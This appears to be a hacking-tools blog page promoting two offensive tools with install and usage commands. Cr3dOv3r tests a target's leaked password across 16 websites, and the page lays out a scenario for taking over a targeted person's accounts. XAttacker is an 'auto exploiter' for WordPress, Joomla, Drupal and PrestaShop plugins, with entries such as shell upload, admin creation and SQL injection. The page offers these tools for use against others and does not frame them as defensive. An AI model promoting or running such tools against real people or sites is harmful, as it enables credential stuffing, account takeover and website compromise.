• Now you give it this email's old or leaked password then it checks this credentials against 16 websites (ex: facebook, twitter, google...) then it tells you if login successful in any website!

Imagine with me this scenario

• You checking a targeted email with this tool.
• The tool finds it in a leak so you open the leakage link.
• You get the leaked password after searching the leak.
• Now you back to the tool and enters this password to check if there's any website the user uses the same password in it.
• You imagine the rest

Screenshots

Usage

usage: Cr3d0v3r.py [-h] email

positional arguments:
  email       Email/username to check
a
optional arguments:
  -h, --help  show this help message and exit

Installing and requirements

To make the tool work at its best you must have :

• Python 3.x.
• Linux or windows system.
• The requirements mentioned in the next few lines.

Installing
+For windows : (After downloading ZIP and upzip it)

cd Cr3dOv3r-master
python -m pip install -r win_requirements.txt
python Cr3dOv3r.py -h

+For linux :

git clone https://github.com/D4Vinci/Cr3dOv3r.git
chmod 777 -R Cr3dOv3r-master
cd Cr3dOv3r-master
pip3 install -r requirements.txt
python Cr3dOv3r.py -h

If you want to add a website to the tool, follow the instructions in the wiki

Contact

• Twitter

Download Cr3dOv3r v0.3

Read More

Website Vulnerability Scanner & Auto Exploiter - XAttacker

XAttacker is a Website Vulnerability Scanner & Auto Exploiter developed by Mohamed Riahi

Installation

git clone https://github.com/Moham3dRiahi/XAttacker.git

Auto Cms Detect

• [1] WordPress :
• [+] Adblock Blocker
• [+] WP All Import
• [+] Blaze
• [+] Catpro
• [+] Cherry Plugin
• [+] Download Manager
• [+] Formcraft
• [+] levoslideshow
• [+] Power Zoomer
• [+] Gravity Forms
• [+] Revslider Upload Shell
• [+] Revslider Dafece Ajax
• [+] Revslider Get Config
• [+] Showbiz
• [+] Simple Ads Manager
• [+] Slide Show Pro
• [+] WP Mobile Detector
• [+] Wysija
• [+] InBoundio Marketing
• [+] dzs-zoomsounds
• [+] Reflex Gallery
• [+] Creative Contact Form
• [+] Work The Flow File Upload
• [+] WP Job Manger
• [+] PHP Event Calendar
• [+] Synoptic
• [+] Wp Shop
• [+] Content Injection
• [2] Joomla
• [+] Com Jce
• [+] Com Media
• [+] Com Jdownloads
• [+] Com Fabrik
• [+] Com Jdownloads Index
• [+] Com Foxcontact
• [+] Com Ads Manager
• [+] Com Blog
• [+] Com Users
• [+] Com Weblinks
• [+] mod_simplefileupload
• [3] DruPal
• [+] Add Admin
• [4] PrestaShop
• [+] columnadverts
• [+] soopamobile
• [+] soopabanners
• [+] Vtermslideshow
• [+] simpleslideshow
• [+] productpageadverts
• [+] homepageadvertise
• [+] homepageadvertise2
• [+] jro_homepageadvertise
• [+] attributewizardpro
• [+] 1attributewizardpro
• [+] AttributewizardproOLD
• [+] attributewizardpro_x
• [+] advancedslider
• [+] cartabandonmentpro
• [+] cartabandonmentproOld
• [+] videostab
• [+] wg24themeadministration
• [+] fieldvmegamenu
• [+] wdoptionpanel
• [+] pk_flexmenu
• [+] pk_vertflexmenu
• [+] nvn_export_orders
• [+] megamenu
• [+] tdpsthemeoptionpanel
• [+] psmodthemeoptionpanel
• [+] masseditproduct
• [5] Lokomedia
• SQL injection

Video

Usage

Short Form	Long Form	Description
-l	--list	websites list

Example
if you have list websites run tool with this command line

perl XAttacker.pl -l list.txt

if you don't have list websites run the tool with this command

perl XAttacker.pl

For coloring in windows Add This Line

use Win32::Console::ANSI;

Version
Current version is 2.1 What's New
• Wordpress Levo-Slideshow 2.3 - Arbitrary File Upload
• GS-Dorker
• speed up
• Bug fixes
version 2.0
• speed up
• Bug fixes
version 1.9
• Bug fixes

Download XAttacker

Read More